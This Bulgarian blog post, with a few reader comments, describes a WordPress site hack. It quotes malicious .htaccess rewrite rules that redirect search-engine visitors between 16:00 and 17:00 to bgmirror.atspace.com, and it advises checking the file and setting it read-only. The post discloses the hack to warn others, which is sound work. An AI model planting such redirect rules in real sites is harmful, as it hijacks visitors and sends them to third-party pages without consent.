htaccess хак за WordPress
Докато правих проучване за позицията ми в Google, останових, че всеки резултат за моя сайт се пренасочва към save-darina.org. Преди известно време се беше получило подобно нещо, но го отдадох на някаква моментна грешка на сървъра. Уви, явно точно в този ден сайтът ми е бил хакнат.
Погледнах .htaccess файла, в който се очаква да има само правилата за WordPress и видях, че освен тях има и следното:
RewriteEngine On
RewriteCond %{TIME_HOUR}%{TIME_MIN} >1600
RewriteCond %{TIME_HOUR}%{TIME_MIN} <1700
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*search.*
RewriteRule ^(.*)$ http://bgmirror.atspace.com/ [L]
Което ще рече, че всички посещения между 16:00 и 17:00, който идват от Google, Yahoo, Live Search, MSN и Search, ще бъдат пренасочени към http://bgmirror.atspace.com/, който явно от своя страна пренасочва към save-darina.org. След бързо проучване се оказа, че това е сравнително известен хак и доста сайтове са били хакнати по този начин.
Ако ползваш WordPress като CMS или блог платформа, може би е добра идея да провериш htaccess файла си за подобен код, тъй като сайтът ти може да е хакнат, а дори да не си разбрал.
6 коментара
Коментарите по този пост
Така като гледам това може да бъде направено на всеки сайт, стига да намерят начин да ти променят .htaccess файла 
За да се предпазиш ми сложи права само за четене, така и да ти хакнат WP-а няма да могат да го променят.
Ако файла ти няма права за писане, WP няма как да пише в него, каквото и да правят. Самия сървър не го позволява
Поради високия интерес от страна на руските spam ботове към този пост, затварям коментарите му, с цел намаляване на spam-а в блога.
Ако искате да добавите нещо по темата, коментарите ви са винаги добре дошли и по E-mail 
